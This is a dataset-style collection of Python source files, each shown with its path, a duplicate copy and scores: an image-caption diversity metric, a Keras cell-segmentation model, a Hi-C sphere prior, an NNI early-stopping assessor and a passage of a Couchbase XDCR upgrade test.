return -np.log(np.sqrt(eigvals[-1]) / (np.sqrt(eigvals).sum())) / np.log(len(eigvals))
sc_scores = [get_div(np.linalg.eigvalsh(_/10)) for _ in scores]
score = np.mean(np.array(sc_scores))
imgToEval = {}
for i, image_id in enumerate(imgIds):
imgToEval[image_id] = {'self_cider': sc_scores[i], 'self_cider_mat': scores[i].tolist()}
return {'overall': {'self_cider': score}, 'imgToEval': imgToEval}
| 0.424173 | 0.117673 |
from keras.models import Sequential
from keras.layers.convolutional import Conv2D, Convolution2DTranspose, UpSampling2D
from keras.layers.pooling import MaxPool2D
from keras import metrics
from keras.layers import Input
from keras.layers.merge import concatenate
from keras.models import Model
from keras.applications import VGG16
from keras.initializers import Ones
def Skip_Cell_Model(no_labels = 2, opt='adadelta', pass_levels = [1,2,3,4]):
"""
A deep convolutional neural network for segmenting Xray tomography data
of cells. The architecture is inspired by DeconvNet, arxiv:1505.04366
and U-net, arxiv:1505.04597.
We use the VGG-16 architecture and weights for the convolutional layers,
then upsample by doubling.
Returns:
A keras model, pre-compiled
Keyword arguments:
no_labels -- number of labelled classes
    opt -- optimizer to be used for training
pass_levels -- the skip through layers to include. Lower layers
include higher resolution data
"""
bottle_neck = VGG16(include_top=False, weights='imagenet')
img_input = Input(shape=(256,256,1))
#The initial VGG 16 layers, with skip throughs added
x = Conv2D(3,(1,1),padding = 'same',input_shape=(256,256,1),
use_bias=False, kernel_initializer=Ones())(img_input)
x = Conv2D(**(bottle_neck.layers[1].get_config()))(x)
x_split_1 = Conv2D(**(bottle_neck.layers[2].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[3].get_config()))(x_split_1)
x = Conv2D(**(bottle_neck.layers[4].get_config()))(x)
x_split_2 = Conv2D(**(bottle_neck.layers[5].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[6].get_config()))(x_split_2)
x = Conv2D(**(bottle_neck.layers[7].get_config()))(x)
x = Conv2D(**(bottle_neck.layers[8].get_config()))(x)
x_split_3 = Conv2D(**(bottle_neck.layers[9].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[10].get_config()))(x_split_3)
x = Conv2D(**(bottle_neck.layers[11].get_config()))(x)
x = Conv2D(**(bottle_neck.layers[12].get_config()))(x)
x_split_4 = Conv2D(**(bottle_neck.layers[13].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[14].get_config()))(x_split_4)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x_join_4 = UpSampling2D((2,2))(x)
if 4 in pass_levels:
x = concatenate([x_join_4,x_split_4],axis=3)
else:
x = x_join_4
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x_join_3 = UpSampling2D((2,2))(x)
if 3 in pass_levels:
x = concatenate([x_join_3,x_split_3],axis=3)
else:
x = x_join_3
x = Convolution2DTranspose(256,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(256,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(256,3,padding='same', activation = 'relu')(x)
x_join_2 = UpSampling2D((2,2))(x)
if 2 in pass_levels:
x = concatenate([x_join_2,x_split_2],axis=3)
else:
x = x_join_2
x = Convolution2DTranspose(128,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(128,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(128,3,padding='same', activation = 'relu')(x)
x_join_1 = UpSampling2D((2,2))(x)
if 1 in pass_levels:
x = concatenate([x_join_1,x_split_1],axis =3)
else:
x = x_join_1
x = Convolution2DTranspose(64,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(64,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(no_labels,1,padding='same',activation='softmax')(x)
model = Model(img_input, x)
model.layers[1].trainable = False
for i in range(14):
(model.layers[i+2]).set_weights((bottle_neck.layers[i+1]).get_weights())
(model.layers[i+2]).trainable = False
model.compile(optimizer=opt, loss='categorical_crossentropy', metrics = [metrics.categorical_accuracy])
return model
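# --- Hedged usage sketch (not part of the original module) ---
# Building the model downloads the ImageNet VGG-16 weights, so this is left
# commented out; the random batch below is purely illustrative. The network
# expects 256x256 single-channel inputs and returns a per-pixel softmax over
# `no_labels` classes at the same resolution.
# import numpy as np
# model = Skip_Cell_Model(no_labels=2, opt='adadelta', pass_levels=[1, 2])
# dummy_batch = np.random.rand(4, 256, 256, 1)
# probs = model.predict(dummy_batch)   # shape: (4, 256, 256, 2)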
|
model.py
|
from keras.models import Sequential
from keras.layers.convolutional import Conv2D, Convolution2DTranspose, UpSampling2D
from keras.layers.pooling import MaxPool2D
from keras import metrics
from keras.layers import Input
from keras.layers.merge import concatenate
from keras.models import Model
from keras.applications import VGG16
from keras.initializers import Ones
def Skip_Cell_Model(no_labels = 2, opt='adadelta', pass_levels = [1,2,3,4]):
"""
A deep convolutional neural network for segmenting Xray tomography data
of cells. The architecture is inspired by DeconvNet, arxiv:1505.04366
and U-net, arxiv:1505.04597.
We use the VGG-16 architecture and weights for the convolutional layers,
then upsample by doubling.
Returns:
A keras model, pre-compiled
Keyword arguments:
no_labels -- number of labelled classes
    opt -- optimizer to be used for training
pass_levels -- the skip through layers to include. Lower layers
include higher resolution data
"""
bottle_neck = VGG16(include_top=False, weights='imagenet')
img_input = Input(shape=(256,256,1))
#The initial VGG 16 layers, with skip throughs added
x = Conv2D(3,(1,1),padding = 'same',input_shape=(256,256,1),
use_bias=False, kernel_initializer=Ones())(img_input)
x = Conv2D(**(bottle_neck.layers[1].get_config()))(x)
x_split_1 = Conv2D(**(bottle_neck.layers[2].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[3].get_config()))(x_split_1)
x = Conv2D(**(bottle_neck.layers[4].get_config()))(x)
x_split_2 = Conv2D(**(bottle_neck.layers[5].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[6].get_config()))(x_split_2)
x = Conv2D(**(bottle_neck.layers[7].get_config()))(x)
x = Conv2D(**(bottle_neck.layers[8].get_config()))(x)
x_split_3 = Conv2D(**(bottle_neck.layers[9].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[10].get_config()))(x_split_3)
x = Conv2D(**(bottle_neck.layers[11].get_config()))(x)
x = Conv2D(**(bottle_neck.layers[12].get_config()))(x)
x_split_4 = Conv2D(**(bottle_neck.layers[13].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[14].get_config()))(x_split_4)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x_join_4 = UpSampling2D((2,2))(x)
if 4 in pass_levels:
x = concatenate([x_join_4,x_split_4],axis=3)
else:
x = x_join_4
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x_join_3 = UpSampling2D((2,2))(x)
if 3 in pass_levels:
x = concatenate([x_join_3,x_split_3],axis=3)
else:
x = x_join_3
x = Convolution2DTranspose(256,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(256,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(256,3,padding='same', activation = 'relu')(x)
x_join_2 = UpSampling2D((2,2))(x)
if 2 in pass_levels:
x = concatenate([x_join_2,x_split_2],axis=3)
else:
x = x_join_2
x = Convolution2DTranspose(128,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(128,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(128,3,padding='same', activation = 'relu')(x)
x_join_1 = UpSampling2D((2,2))(x)
if 1 in pass_levels:
x = concatenate([x_join_1,x_split_1],axis =3)
else:
x = x_join_1
x = Convolution2DTranspose(64,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(64,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(no_labels,1,padding='same',activation='softmax')(x)
model = Model(img_input, x)
model.layers[1].trainable = False
for i in range(14):
(model.layers[i+2]).set_weights((bottle_neck.layers[i+1]).get_weights())
(model.layers[i+2]).trainable = False
model.compile(optimizer=opt, loss='categorical_crossentropy', metrics = [metrics.categorical_accuracy])
return model
| 0.895836 | 0.673156 |
import numpy
from csb.statistics.pdf.parameterized import Parameter
from binf import ArrayParameter
from binf.pdf.priors import AbstractPrior
from .sphere_prior_c import sphere_prior_gradient
class SpherePrior(AbstractPrior):
def __init__(self, name, sphere_radius, sphere_k, n_structures,
bead_radii, sphere_center=None):
"""
Structural Boltzmann-like prior distribution harmonically restraining
all beads to be located within a sphere of a given radius
:param name: a unique name for this object, usually 'sphere_prior'
:type name: string
:param sphere_radius: the radius of the sphere within which to
restrain the beads
:type sphere_radius: float
:param sphere_k: force constant
:type sphere_k: float
:param n_structures: number of ensemble members
:type n_structures: int
:param bead_radii: bead radii for each bead
:type bead_radii: :class:`numpy.ndarray`
:param sphere_center: coordinates of the sphere center,
if none, (0, 0, 0) is assumed
:type sphere_center: :class:`numpy.ndarray`
:returns: set-up spherical prior distribution object
:rtype: :class:`.SpherePrior`
"""
super(SpherePrior, self).__init__(name)
self.n_structures = n_structures
self.bead_radii = bead_radii
self.bead_radii2 = bead_radii ** 2
self._register_variable('structures', differentiable=True)
self._register('sphere_radius')
self['sphere_radius'] = Parameter(sphere_radius, 'sphere_radius')
self._register('sphere_k')
self['sphere_k'] = Parameter(sphere_k, 'sphere_k')
self._register('sphere_center')
sphere_center = numpy.zeros(3) if sphere_center is None else sphere_center
self['sphere_center'] = ArrayParameter(sphere_center, 'sphere_center')
self.update_var_param_types(structures=ArrayParameter)
self._set_original_variables()
def _single_structure_log_prob(self, structure):
r = self['sphere_radius'].value
k = self['sphere_k'].value
br = self.bead_radii
X = structure.reshape(-1, 3)
norms = numpy.sqrt(numpy.sum((X - self['sphere_center'].value[None,:])
**2, 1))
violating = norms + br > r
return -0.5 * k * numpy.sum((norms[violating] + br[violating] - r) ** 2)
def _single_structure_gradient(self, structure):
X = structure.reshape(-1, 3)
return sphere_prior_gradient(X,
self['sphere_center'].value,
self['sphere_radius'].value,
self['sphere_k'].value,
numpy.arange(len(X)),
self.bead_radii,
self.bead_radii2)
def _evaluate_log_prob(self, structures):
log_prob = self._single_structure_log_prob
X = structures.reshape(self.n_structures, -1, 3)
        # a list comprehension keeps this working under Python 3, where
        # numpy.sum over a map object does not reduce the values
        return numpy.sum([log_prob(structure=x) for x in X])
def _evaluate_gradient(self, structures):
grad = self._single_structure_gradient
X = structures.reshape(self.n_structures, -1, 3)
        # numpy.concatenate needs a sequence, not an iterator, under Python 3
        return numpy.concatenate([grad(structure=x) for x in X])
def clone(self):
copy = self.__class__(name=self.name,
sphere_radius=self['sphere_radius'].value,
sphere_k=self['sphere_k'].value,
n_structures=self.n_structures,
bead_radii=self.bead_radii,
sphere_center=self['sphere_center'].value)
copy.set_fixed_variables_from_pdf(self)
return copy
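# --- Hedged illustration (not part of the original module) ---
# A standalone sketch of the harmonic sphere restraint evaluated in
# _single_structure_log_prob: only beads whose surface leaves the sphere
# (|x - center| + bead_radius > R) are penalised, each contributing
# -0.5 * k * (|x - center| + bead_radius - R) ** 2. All numbers are made up.
def _sphere_penalty_demo():
    center = numpy.zeros(3)
    R, k = 10.0, 5.0
    bead_radii = numpy.array([1.0, 1.0])
    X = numpy.array([[0.0, 0.0, 0.0],    # well inside: no penalty
                     [0.0, 0.0, 9.5]])   # 9.5 + 1.0 > 10.0: penalised
    norms = numpy.sqrt(((X - center) ** 2).sum(1))
    violating = norms + bead_radii > R
    # -0.5 * 5.0 * 0.5 ** 2 == -0.625 for the values above
    return -0.5 * k * ((norms[violating] + bead_radii[violating] - R) ** 2).sum()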
|
ensemble_hic/sphere_prior.py
|
import numpy
from csb.statistics.pdf.parameterized import Parameter
from binf import ArrayParameter
from binf.pdf.priors import AbstractPrior
from .sphere_prior_c import sphere_prior_gradient
class SpherePrior(AbstractPrior):
def __init__(self, name, sphere_radius, sphere_k, n_structures,
bead_radii, sphere_center=None):
"""
Structural Boltzmann-like prior distribution harmonically restraining
all beads to be located within a sphere of a given radius
:param name: a unique name for this object, usually 'sphere_prior'
:type name: string
:param sphere_radius: the radius of the sphere within which to
restrain the beads
:type sphere_radius: float
:param sphere_k: force constant
:type sphere_k: float
:param n_structures: number of ensemble members
:type n_structures: int
:param bead_radii: bead radii for each bead
:type bead_radii: :class:`numpy.ndarray`
:param sphere_center: coordinates of the sphere center,
if none, (0, 0, 0) is assumed
:type sphere_center: :class:`numpy.ndarray`
:returns: set-up spherical prior distribution object
:rtype: :class:`.SpherePrior`
"""
super(SpherePrior, self).__init__(name)
self.n_structures = n_structures
self.bead_radii = bead_radii
self.bead_radii2 = bead_radii ** 2
self._register_variable('structures', differentiable=True)
self._register('sphere_radius')
self['sphere_radius'] = Parameter(sphere_radius, 'sphere_radius')
self._register('sphere_k')
self['sphere_k'] = Parameter(sphere_k, 'sphere_k')
self._register('sphere_center')
sphere_center = numpy.zeros(3) if sphere_center is None else sphere_center
self['sphere_center'] = ArrayParameter(sphere_center, 'sphere_center')
self.update_var_param_types(structures=ArrayParameter)
self._set_original_variables()
def _single_structure_log_prob(self, structure):
r = self['sphere_radius'].value
k = self['sphere_k'].value
br = self.bead_radii
X = structure.reshape(-1, 3)
norms = numpy.sqrt(numpy.sum((X - self['sphere_center'].value[None,:])
**2, 1))
violating = norms + br > r
return -0.5 * k * numpy.sum((norms[violating] + br[violating] - r) ** 2)
def _single_structure_gradient(self, structure):
X = structure.reshape(-1, 3)
return sphere_prior_gradient(X,
self['sphere_center'].value,
self['sphere_radius'].value,
self['sphere_k'].value,
numpy.arange(len(X)),
self.bead_radii,
self.bead_radii2)
def _evaluate_log_prob(self, structures):
log_prob = self._single_structure_log_prob
X = structures.reshape(self.n_structures, -1, 3)
        # a list comprehension keeps this working under Python 3, where
        # numpy.sum over a map object does not reduce the values
        return numpy.sum([log_prob(structure=x) for x in X])
def _evaluate_gradient(self, structures):
grad = self._single_structure_gradient
X = structures.reshape(self.n_structures, -1, 3)
        # numpy.concatenate needs a sequence, not an iterator, under Python 3
        return numpy.concatenate([grad(structure=x) for x in X])
def clone(self):
copy = self.__class__(name=self.name,
sphere_radius=self['sphere_radius'].value,
sphere_k=self['sphere_k'].value,
n_structures=self.n_structures,
bead_radii=self.bead_radii,
sphere_center=self['sphere_center'].value)
copy.set_fixed_variables_from_pdf(self)
return copy
| 0.937996 | 0.476519 |
import logging
from nni.assessor import Assessor, AssessResult
logger = logging.getLogger('medianstop_Assessor')
class MedianstopAssessor(Assessor):
"""MedianstopAssessor is The median stopping rule stops a pending trial X at step S
if the trial’s best objective value by step S is strictly worse than the median value
of the running averages of all completed trials’ objectives reported up to step S
Parameters
----------
optimize_mode: str
optimize mode, 'maximize' or 'minimize'
start_step: int
only after receiving start_step number of reported intermediate results
"""
def __init__(self, optimize_mode='maximize', start_step=0):
self.start_step = start_step
self.running_history = dict()
self.completed_avg_history = dict()
if optimize_mode == 'maximize':
self.high_better = True
elif optimize_mode == 'minimize':
self.high_better = False
else:
self.high_better = True
            logger.warning('unrecognized optimize_mode: %s', optimize_mode)
def _update_data(self, trial_job_id, trial_history):
"""update data
Parameters
----------
trial_job_id: int
trial job id
trial_history: list
The history performance matrix of each trial
"""
if trial_job_id not in self.running_history:
self.running_history[trial_job_id] = []
self.running_history[trial_job_id].extend(trial_history[len(self.running_history[trial_job_id]):])
def trial_end(self, trial_job_id, success):
"""trial_end
Parameters
----------
trial_job_id: int
trial job id
success: bool
            True if the trial finished successfully, False otherwise
"""
if trial_job_id in self.running_history:
if success:
cnt = 0
history_sum = 0
self.completed_avg_history[trial_job_id] = []
for each in self.running_history[trial_job_id]:
cnt += 1
history_sum += each
self.completed_avg_history[trial_job_id].append(history_sum / cnt)
self.running_history.pop(trial_job_id)
else:
            logger.warning('trial_end: trial_job_id is not in running_history')
def assess_trial(self, trial_job_id, trial_history):
"""assess_trial
Parameters
----------
trial_job_id: int
trial job id
trial_history: list
The history performance matrix of each trial
Returns
-------
bool
AssessResult.Good or AssessResult.Bad
        Raises
        ------
        Exception
            unrecognized exception in medianstop_assessor
"""
curr_step = len(trial_history)
if curr_step < self.start_step:
return AssessResult.Good
try:
num_trial_history = [float(ele) for ele in trial_history]
        except (TypeError, ValueError) as error:
            logger.warning('incorrect data type or value:')
            logger.exception(error)
            # without a numeric history the trial cannot be assessed, so let it continue
            return AssessResult.Good
        except Exception as error:
            logger.warning('unrecognized exception in medianstop_assessor:')
            logger.exception(error)
            return AssessResult.Good
self._update_data(trial_job_id, num_trial_history)
if self.high_better:
best_history = max(trial_history)
else:
best_history = min(trial_history)
avg_array = []
for id in self.completed_avg_history:
if len(self.completed_avg_history[id]) >= curr_step:
avg_array.append(self.completed_avg_history[id][curr_step - 1])
if len(avg_array) > 0:
avg_array.sort()
if self.high_better:
median = avg_array[(len(avg_array)-1) // 2]
return AssessResult.Bad if best_history < median else AssessResult.Good
else:
median = avg_array[len(avg_array) // 2]
return AssessResult.Bad if best_history > median else AssessResult.Good
else:
return AssessResult.Good
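# --- Hedged illustration (not part of the original assessor) ---
# A toy walk-through of the rule in assess_trial, with invented numbers and
# optimize_mode='maximize': three completed trials have running averages of
# 0.7, 0.5 and 0.6 at step 2, so the median is 0.6; a pending trial whose best
# reported value so far is 0.55 (< 0.6) is assessed as Bad and stopped.
def _medianstop_rule_demo():
    completed_running_averages = {'t1': [0.6, 0.7], 't2': [0.4, 0.5], 't3': [0.55, 0.6]}
    pending_history = [0.5, 0.55]
    curr_step = len(pending_history)
    best_history = max(pending_history)
    avg_array = sorted(avgs[curr_step - 1]
                       for avgs in completed_running_averages.values()
                       if len(avgs) >= curr_step)
    median = avg_array[(len(avg_array) - 1) // 2]
    # median == 0.6 and best_history == 0.55 here, so the result is Bad
    return AssessResult.Bad if best_history < median else AssessResult.Good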
|
src/sdk/pynni/nni/medianstop_assessor/medianstop_assessor.py
|
import logging
from nni.assessor import Assessor, AssessResult
logger = logging.getLogger('medianstop_Assessor')
class MedianstopAssessor(Assessor):
"""MedianstopAssessor is The median stopping rule stops a pending trial X at step S
if the trial’s best objective value by step S is strictly worse than the median value
of the running averages of all completed trials’ objectives reported up to step S
Parameters
----------
optimize_mode: str
optimize mode, 'maximize' or 'minimize'
start_step: int
only after receiving start_step number of reported intermediate results
"""
def __init__(self, optimize_mode='maximize', start_step=0):
self.start_step = start_step
self.running_history = dict()
self.completed_avg_history = dict()
if optimize_mode == 'maximize':
self.high_better = True
elif optimize_mode == 'minimize':
self.high_better = False
else:
self.high_better = True
            logger.warning('unrecognized optimize_mode: %s', optimize_mode)
def _update_data(self, trial_job_id, trial_history):
"""update data
Parameters
----------
trial_job_id: int
trial job id
trial_history: list
The history performance matrix of each trial
"""
if trial_job_id not in self.running_history:
self.running_history[trial_job_id] = []
self.running_history[trial_job_id].extend(trial_history[len(self.running_history[trial_job_id]):])
def trial_end(self, trial_job_id, success):
"""trial_end
Parameters
----------
trial_job_id: int
trial job id
success: bool
            True if the trial finished successfully, False otherwise
"""
if trial_job_id in self.running_history:
if success:
cnt = 0
history_sum = 0
self.completed_avg_history[trial_job_id] = []
for each in self.running_history[trial_job_id]:
cnt += 1
history_sum += each
self.completed_avg_history[trial_job_id].append(history_sum / cnt)
self.running_history.pop(trial_job_id)
else:
            logger.warning('trial_end: trial_job_id is not in running_history')
def assess_trial(self, trial_job_id, trial_history):
"""assess_trial
Parameters
----------
trial_job_id: int
trial job id
trial_history: list
The history performance matrix of each trial
Returns
-------
bool
AssessResult.Good or AssessResult.Bad
        Raises
        ------
        Exception
            unrecognized exception in medianstop_assessor
"""
curr_step = len(trial_history)
if curr_step < self.start_step:
return AssessResult.Good
try:
num_trial_history = [float(ele) for ele in trial_history]
        except (TypeError, ValueError) as error:
            logger.warning('incorrect data type or value:')
            logger.exception(error)
            # without a numeric history the trial cannot be assessed, so let it continue
            return AssessResult.Good
        except Exception as error:
            logger.warning('unrecognized exception in medianstop_assessor:')
            logger.exception(error)
            return AssessResult.Good
self._update_data(trial_job_id, num_trial_history)
if self.high_better:
best_history = max(trial_history)
else:
best_history = min(trial_history)
avg_array = []
for id in self.completed_avg_history:
if len(self.completed_avg_history[id]) >= curr_step:
avg_array.append(self.completed_avg_history[id][curr_step - 1])
if len(avg_array) > 0:
avg_array.sort()
if self.high_better:
median = avg_array[(len(avg_array)-1) // 2]
return AssessResult.Bad if best_history < median else AssessResult.Good
else:
median = avg_array[len(avg_array) // 2]
return AssessResult.Bad if best_history > median else AssessResult.Good
else:
return AssessResult.Good
| 0.724675 | 0.328664 |
import queue
import copy, json
from .newupgradebasetest import NewUpgradeBaseTest
from remote.remote_util import RemoteMachineShellConnection, RemoteUtilHelper
from couchbase_helper.documentgenerator import BlobGenerator
from membase.api.rest_client import RestConnection, RestHelper
from membase.api.exception import RebalanceFailedException
from membase.helper.cluster_helper import ClusterOperationHelper
from memcached.helper.kvstore import KVStore
from fts.stable_topology_fts import StableTopFTS
from pytests.fts.fts_callable import FTSCallable
from couchbase.cluster import Cluster, PasswordAuthenticator
from security.rbac_base import RbacBase
from threading import Thread
from collection.collections_cli_client import CollectionsCLI
from collection.collections_rest_client import CollectionsRest
from collection.collections_stats import CollectionsStats
class XDCRUpgradeCollectionsTests(NewUpgradeBaseTest):
def setUp(self):
super(XDCRUpgradeCollectionsTests, self).setUp()
self.nodes_init = self.input.param('nodes_init', 2)
self.queue = queue.Queue()
self.rate_limit = self.input.param("rate_limit", 100000)
self.batch_size = self.input.param("batch_size", 1000)
self.doc_size = self.input.param("doc_size", 100)
self.loader = self.input.param("loader", "high_doc_ops")
self.instances = self.input.param("instances", 4)
self.threads = self.input.param("threads", 5)
self.use_replica_to = self.input.param("use_replica_to", False)
self.index_name_prefix = None
self.rest_src = RestConnection(self.servers[0])
def tearDown(self):
super(XDCRUpgradeCollectionsTests, self).tearDown()
def enable_migration_mode(self, src_bucket, dest_bucket):
setting_val_map = {"collectionsMigrationMode": "true",
"colMappingRules": '{"REGEXP_CONTAINS(META().id,\'0$\')":"scope1.mycollection_scope1"}'
}
self.rest_src.set_xdcr_params(src_bucket, dest_bucket, setting_val_map)
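    # --- Hedged note (not part of the original test) ---
    # The mapping rule configured above migrates every source document whose
    # key matches REGEXP_CONTAINS(META().id, '0$') -- i.e. keys ending in "0"
    # -- into scope1.mycollection_scope1 on the destination bucket. A toy
    # illustration of which keys that regex selects (names are invented):
    #   import re
    #   keys = ["doc_10", "doc_11", "doc_20"]
    #   [k for k in keys if re.search(r"0$", k)]   # -> ["doc_10", "doc_20"]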
def verify_doc_counts(self):
des_master = self.servers[self.nodes_init]
src_cbver = RestConnection(self.master).get_nodes_version()
des_cbver = RestConnection(des_master).get_nodes_version()
src_items = RestConnection(self.master).get_buckets_itemCount()
des_items = RestConnection(des_master).get_buckets_itemCount()
if src_cbver[:3] < "7.0" and des_cbver[:3] >= "7.0":
des_items = self.get_col_item_count(des_master, "default", "_default",
"_default", self.des_stat_col)
if src_items["default"] != des_items:
self.fail("items do not match. src: {0} != des: {1}"
.format(src_items["default"], des_items))
elif src_cbver[:3] >= "7.0" and des_cbver[:3] < "7.0":
src_items = self.get_col_item_count(self.master, "default", "_default",
"_default", self.stat_col)
if src_items != des_items["default"]:
self.fail("items do not match. src: {0} != des: {1}"
.format(src_items, des_items["default"]))
elif src_cbver[:3] >= "7.0" and des_cbver[:3] >= "7.0":
if src_items["default"] != des_items["default"]:
self.fail("items do not match. src: {0} != des: {1}"
.format(src_items["default"], des_items["default"]))
def test_xdcr_upgrade_with_services(self):
after_upgrade_services_in = self.input.param("after_upgrade_services_in", False)
after_upgrade_buckets_in = self.input.param("after_upgrade_buckets_in", False)
after_upgrade_buckets_out = self.input.param("after_upgrade_buckets_out", False)
after_upgrade_buckets_flush = self.input.param("after_upgrade_buckets_flush", False)
# Install initial version on the specified nodes
self._install(self.servers[:self.nodes_init])
# Configure the nodes with services on cluster1
self.operations(self.servers[:self.nodes_init], services="kv,kv")
        # get the n1ql node which will be used in pre, during and post upgrade for running n1ql commands
self.n1ql_server = self.get_nodes_from_services_map(service_type="n1ql")
# Run the pre upgrade operations, typically creating index
self.pre_upgrade(self.servers[:self.nodes_init])
if self.input.param("ddocs_num", 0) > 0:
self.create_ddocs_and_views()
self._install(self.servers[self.nodes_init:self.num_servers])
self.master = self.servers[self.nodes_init]
# Configure the nodes with services on the other cluster2
try:
self.operations(self.servers[self.nodes_init:self.num_servers], services="kv,kv")
self.sleep(timeout=10)
except Exception as ex:
if ex:
print("error: ", str(ex))
self.log.info("bucket is created")
# create a xdcr relationship between cluster1 and cluster2
self.rest_src.add_remote_cluster(self.servers[self.nodes_init].ip,
self.servers[self.nodes_init].port,
'Administrator', 'password', "C2")
repl_id = self.rest_src.start_replication('continuous', 'default', "C2")
if repl_id is not None:
self.log.info("Replication created successfully")
# Run the post_upgrade operations
self._create_ephemeral_buckets()
self.post_upgrade(self.servers[:self.nodes_init])
# Add new services after the upgrade
for upgrade_version in self.upgrade_versions:
src_nodes = self.servers[:self.nodes_init]
for server in src_nodes:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
src_upgrade_threads = self._async_update(upgrade_version, src_nodes)
for upgrade_thread in src_upgrade_threads:
upgrade_thread.join()
src_success_upgrade = True
while not self.queue.empty():
src_success_upgrade &= self.queue.get()
if not src_success_upgrade:
self.fail("Upgrade failed in source cluster. See logs above!")
else:
self.log.info("Upgrade source cluster success")
des_nodes = self.servers[self.nodes_init:self.num_servers]
self.master = self.servers[self.nodes_init]
for server in des_nodes:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
des_upgrade_threads = self._async_update(upgrade_version, des_nodes)
for upgrade_thread in des_upgrade_threads:
upgrade_thread.join()
des_success_upgrade = True
while not self.queue.empty():
des_success_upgrade &= self.queue.get()
if not des_success_upgrade:
self.fail("Upgrade failed in des cluster. See logs above!")
else:
self.log.info("Upgrade des cluster success")
self.master = self.servers[0]
self.rest = RestConnection(self.master)
self.rest_col = CollectionsRest(self.master)
self.cli_col = CollectionsCLI(self.master)
self.stat_col = CollectionsStats(self.master)
self.log.info("Create scope collection at src cluster")
#self.rest_col.create_scope_collection_count()
self._create_scope_collection(self.rest_col, self.cli_col, self.buckets[0].name)
self.sleep(10)
self.des_rest = RestConnection(self.servers[self.nodes_init])
self.des_rest_col = CollectionsRest(self.servers[self.nodes_init])
self.des_cli_col = CollectionsCLI(self.servers[self.nodes_init])
self.des_stat_col = CollectionsStats(self.servers[self.nodes_init])
self.log.info("Create scope collection at des cluster")
self.buckets = RestConnection(self.servers[self.nodes_init]).get_buckets()
self._create_scope_collection(self.des_rest_col, self.des_cli_col, self.buckets[0].name)
self.load_to_collections_bucket()
self.enable_migration = self.input.param("enable_migration", False)
if self.enable_migration:
self.enable_migration_mode(self.buckets[0].name, self.buckets[0].name)
self.verify_doc_counts()
if after_upgrade_buckets_in is not False:
self.bucket_size = 100
self._create_sasl_buckets(self.master, 1)
self._create_standard_buckets(self.master, 1)
if self.input.param("ddocs_num", 0) > 0:
self.create_ddocs_and_views()
gen_load = BlobGenerator('upgrade', 'upgrade-', self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen_load, "create", self.expire_time,
flag=self.item_flag)
# deleting buckets after upgrade
if after_upgrade_buckets_out is not False:
self._all_buckets_delete(self.master)
# flushing buckets after upgrade
if after_upgrade_buckets_flush is not False:
self._all_buckets_flush()
def run_view_queries(self):
view_query_thread = Thread(target=self.view_queries, name="run_queries",
args=(self.run_view_query_iterations,))
return view_query_thread
def view_queries(self, iterations):
query = {"connectionTimeout": 60000}
for count in range(iterations):
for i in range(self.view_num):
self.cluster.query_view(self.master, self.ddocs[0].name,
self.default_view_name + str(i), query,
expected_rows=None, bucket="default", retry_time=2)
def create_user(self, node):
self.log.info("inside create_user")
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket',
'password': 'password'}]
rolelist = [{'id': 'cbadminbucket', 'name': 'cbadminbucket',
'roles': 'admin'}]
self.log.info("before create_user_source")
RbacBase().create_user_source(testuser, 'builtin', node)
self.log.info("before add_user_role")
RbacBase().add_user_role(rolelist, RestConnection(node), 'builtin')
|
pytests/upgrade/xdcr_upgrade_collections.py
|
import queue
import copy, json
from .newupgradebasetest import NewUpgradeBaseTest
from remote.remote_util import RemoteMachineShellConnection, RemoteUtilHelper
from couchbase_helper.documentgenerator import BlobGenerator
from membase.api.rest_client import RestConnection, RestHelper
from membase.api.exception import RebalanceFailedException
from membase.helper.cluster_helper import ClusterOperationHelper
from memcached.helper.kvstore import KVStore
from fts.stable_topology_fts import StableTopFTS
from pytests.fts.fts_callable import FTSCallable
from couchbase.cluster import Cluster, PasswordAuthenticator
from security.rbac_base import RbacBase
from threading import Thread
from collection.collections_cli_client import CollectionsCLI
from collection.collections_rest_client import CollectionsRest
from collection.collections_stats import CollectionsStats
class XDCRUpgradeCollectionsTests(NewUpgradeBaseTest):
def setUp(self):
super(XDCRUpgradeCollectionsTests, self).setUp()
self.nodes_init = self.input.param('nodes_init', 2)
self.queue = queue.Queue()
self.rate_limit = self.input.param("rate_limit", 100000)
self.batch_size = self.input.param("batch_size", 1000)
self.doc_size = self.input.param("doc_size", 100)
self.loader = self.input.param("loader", "high_doc_ops")
self.instances = self.input.param("instances", 4)
self.threads = self.input.param("threads", 5)
self.use_replica_to = self.input.param("use_replica_to", False)
